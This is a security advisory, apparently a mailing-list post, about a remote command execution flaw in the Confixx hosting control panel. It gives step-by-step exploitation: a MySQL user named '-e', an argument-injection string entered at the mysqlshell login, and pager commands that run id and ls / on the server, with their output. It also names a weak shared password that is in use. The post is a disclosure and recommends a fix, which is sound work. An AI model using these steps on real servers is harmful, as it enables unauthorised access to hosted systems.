confixx (remote access)

[Ralf Dreibrodt <rd () mesos de>]

hi,

Information about Confixx (from http://www.confixx.de):
======================================================

Confixx is a comfortable tool to automate customer administration on
Linux-based webservers with graphic interfaces for Admin, Resellers and
End Users. Currently there are more than 4200 Confixx licenses
registered. More than 150 new licenses are added each week.

The problem:
===========

you can execute commands on a lot of confixx-boxes nearly without any
account.
you need to know:
- a webhostingprovider running confixx
- the password of the mysqlshell-user
- access to _any_ mysql-server

the password of the mysqlshell-user is the same for all customers.
normally you can't do anything with this account, if you don't have
access to one specific mysql-server.

i even found one big german provider, which uses 123456 as password on
all his servers for the mysqlshell-account.

you have to add a user with the name "-e" on your mysql-server with the
password PASSWORD and read access to the table TABLE.

now you can do the following:

---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user

Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------

here you have to enter the following string:
 -e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1

after that you get prompted for a password, enter your PASSWORD (from
the user "-e" on your mysql-server) here.

---------------
web1
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
...
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
...

Vendor:
======

a customer, who uses confixx, informed the vendor about 20 months(!)
ago.
confixx just added the following line: export EDITOR="/bin/false";
so you can't use "edit;" at the mysql-prompt anymore and can't get an
interactive shell via vi.

but you still can login without access to the mysql-server on the
attacked server and you can still execute commands on this server.

Solution:
========

Delete the mysqlshell-user

This is the second problem i found in confixx without searching for
problems...
When i have some spare time or i get paid for it, i will search for
further bugs, i am sure, there are more.

Thanks,
Ralf